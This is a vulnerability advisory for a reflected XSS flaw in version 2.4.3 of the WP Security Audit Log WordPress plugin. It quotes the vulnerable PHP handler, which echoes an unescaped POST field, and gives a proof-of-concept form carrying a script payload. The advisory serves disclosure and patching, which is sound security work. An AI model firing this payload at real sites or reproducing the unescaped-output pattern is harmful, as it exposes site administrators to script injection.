WP Security Audit Log [Reflected XSS]

Description

Plugin WP Security Audit Log is vulnerable to a Reflected XSS attack by using the AJAX action AjaxDisableCustomField. Vulnerable param is $_POST['notice']. Vulnerable code is in method \WpSecurityAuditLog::AjaxDisableCustomField():

public function AjaxDisableCustomField(){ 
    $fields = $this->GetGlobalOption('excluded-custom');
    if ( isset($fields) && $fields != "") {
        $fields .= ",".$_POST['notice'];
    } else {
        $fields = $_POST['notice'];
    }
    $this->SetGlobalOption('excluded-custom', $fields);
    echo 'Custom Field '.$_POST['notice'].' is no longer being monitored.<br />Enable the monitoring of this custom field again from the <a href="admin.php?page=wsal-settings#tab-exclude"> Excluded Objects </a> tab in the plugin settings';
    die;
}

This method is also missing capabilities and anti-CSRF check but these are described in DWF-2016-87076

PoC

<form action="http://sbwp3.dev/wp-admin/admin-ajax.php" method="post">
    <input name="action" type="hidden" value="AjaxDisableCustomField" />
    <input name="notice" type="hidden" value="<script>alert(String.fromCharCode(88, 83, 83))</script>" />
    <input type="submit" value="Click Me!" />
</form>

Solution

Upgrade to v2.4.4 or later

WordPress Plugins Reflected XSS XSS

INFO

28 June 2016
Pan Vag
www.wpwhitesecurity.com
wordpress.org
2.4.3
WordPress 4.5.2
DWF-2016-87075